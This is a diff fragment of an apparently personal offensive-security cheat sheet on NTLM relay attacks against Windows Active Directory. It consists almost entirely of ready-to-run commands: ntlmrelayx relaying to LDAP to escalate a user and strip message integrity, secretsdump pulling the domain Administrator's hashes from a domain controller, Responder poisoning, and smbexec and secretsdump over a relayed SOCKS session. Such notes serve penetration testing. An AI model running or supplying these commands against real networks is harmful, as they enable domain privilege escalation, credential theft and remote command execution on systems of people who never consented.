ville87/offsec/Windows/NTLMRelayX.md

    `ntlmrelayx.py -t ldap://dc.domain.local --escalate-user USER --remove-mic -smb2support`
  - Run secretsdump on domain administrator:
    `secretsdump.py winlab.csnc.ch/hostname$@dc.winlab.csnc.ch -just-dc -just-dc-user Administrator`

+ Note: If you want, you can run Responder at the same time, but in that case you have to disable SMB and HTTP server for Responder:
+ - Start Responder.py with SMB and HTTP disabled:
+   `sudo /opt/Responder/Responder.py -I eth1 -w -r -f -d`

 ## Using the socks connection
  - Once there is an authenticated socks connection (check with command "socks" in ntlmrelayx console), it can be used with proxychains:
    `proxychains smbexec.py 'DOMAIN/user:gugus@<target-ip>'`
+   `proxychains secretsdump.py random@100.2.2.2`

 - If you relay a machine account:
    `proxychains smbexec.py 'DOMAIN/MACHINE$:gugus@<target-ip>'`